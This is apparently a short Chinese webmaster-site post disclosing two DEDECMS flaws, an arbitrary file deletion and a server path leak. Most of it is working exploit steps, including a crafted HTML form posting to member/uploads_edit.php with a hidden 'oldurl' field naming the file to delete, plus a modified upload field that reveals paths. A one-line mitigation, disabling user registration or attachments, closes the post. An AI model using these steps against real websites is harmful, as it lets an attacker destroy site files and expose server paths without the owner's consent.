DEDECMS 最新漏洞可任意删除文件

DEDECMS 最新漏洞,可任意删除文件。DEDE在五月发布了最新的补丁。可是这个补丁并没有用。现在将些BUG发布出来。

1.删除网站任意文件.

2.显示对路径

1.删除任意文件.

注册正常用户...随意找个地方上传个附件就OK.

部分代码:

<form class="mTB10 mL10 mR10" name="form1" action="http://网站地址/member/uploads_edit.php" method="post" enctype="multipart/form-data">

<input type="hidden" name="aid" value="28" />

<input type="hidden" name="mediatype" value="1" />

<input type="hidden" name="oldurl" value="要删除的文件" /> <!--如value="/index.php">

<input type="hidden" name="dopost" value="save" />

<table cellspacing="1" class="submit">

修改完毕后.打开HTML页.直接点提交.

然后在用户管理附件里点击删除.

2.爆路径.

也是利用原来的html代码..

<td align="right" valign="top">更换附件：</td>

<td><input name="addonfile" type="file" id="addonfile" style="width:300px" /></td>

把type="file"删除.保存.然后打开.直接点提交.

就可以爆路径了..

临时解决方法.:禁止用户注册.或禁止用户发附件

聚站吧|站长资讯交流群 84087572欢迎大家前来交流。

首发：聚站吧|站长资讯http://www.cnjz8.com 如有转载请保留出处。